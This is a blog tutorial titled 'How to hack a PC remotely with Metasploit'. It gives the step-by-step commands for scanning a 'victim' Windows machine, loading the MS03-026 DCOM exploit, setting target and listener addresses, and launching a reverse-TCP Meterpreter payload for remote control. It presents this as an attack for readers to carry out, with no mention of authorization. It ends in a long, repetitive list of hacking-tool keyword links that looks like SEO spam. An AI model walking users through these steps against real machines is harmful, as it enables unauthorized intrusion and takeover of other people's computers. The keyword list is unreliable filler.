Sunday, January 21, 2024

HOW TO HACK A PC REMOTELY WITH METASPLOIT?

Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.

SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?

REQUIREMENTS

Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim

STEPS TO FOLLOW

Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.
More information
  1. Hacking Tools Pc
  2. Pentest Tools Url Fuzzer
  3. Hackers Toolbox
  4. Hacking Tools Hardware
  5. Growth Hacker Tools
  6. Hacking Tools For Pc
  7. Top Pentest Tools
  8. Nsa Hack Tools
  9. What Are Hacking Tools
  10. New Hack Tools
  11. Hacker Tools Hardware
  12. Hacker Hardware Tools
  13. Blackhat Hacker Tools
  14. Underground Hacker Sites
  15. Hacker Tools For Windows
  16. Free Pentest Tools For Windows
  17. Install Pentest Tools Ubuntu
  18. Pentest Tools Windows
  19. Pentest Tools Port Scanner
  20. Pentest Box Tools Download
  21. Hacking Tools Kit
  22. Hacker Security Tools
  23. Pentest Tools Free
  24. Hack Tools Github
  25. Pentest Tools Github
  26. Hacking Tools For Pc
  27. How To Make Hacking Tools
  28. Hacking App
  29. Hacker Search Tools
  30. Top Pentest Tools
  31. Nsa Hacker Tools
  32. Pentest Tools Nmap
  33. Best Pentesting Tools 2018
  34. Hacking Tools Windows
  35. Hack Tools Download
  36. Hack And Tools
  37. Hack Tool Apk No Root
  38. Hack App
  39. Hacker Tools Apk Download
  40. What Is Hacking Tools
  41. What Is Hacking Tools
  42. Pentest Tools Review
  43. Bluetooth Hacking Tools Kali
  44. Game Hacking
  45. Hack Website Online Tool
  46. Top Pentest Tools
  47. Best Pentesting Tools 2018
  48. Hack Tools For Games
  49. Pentest Tools Online
  50. Pentest Tools
  51. Hack App
  52. Pentest Tools Find Subdomains
  53. What Is Hacking Tools
  54. Easy Hack Tools
  55. Hacking Tools For Windows
  56. Pentest Tools Website
  57. Hacker Tools Software
  58. Pentest Tools Linux
  59. Hack Tools Pc
  60. Hack Tool Apk No Root
  61. Free Pentest Tools For Windows
  62. Hack Tool Apk
  63. Pentest Tools Android
  64. Hacker Tools Github
  65. Hacking Tools Usb
  66. Hacking Tools For Windows
  67. Game Hacking
  68. Hack Tool Apk
  69. Hack App
  70. Wifi Hacker Tools For Windows
  71. How To Install Pentest Tools In Ubuntu
  72. Pentest Recon Tools
  73. Hacking Tools Pc
  74. Pentest Tools Nmap
  75. Hacking Tools Windows 10
  76. Hacker Tools
  77. Hacker Tools 2019
  78. Hack Website Online Tool
  79. Blackhat Hacker Tools
  80. Hacker Tools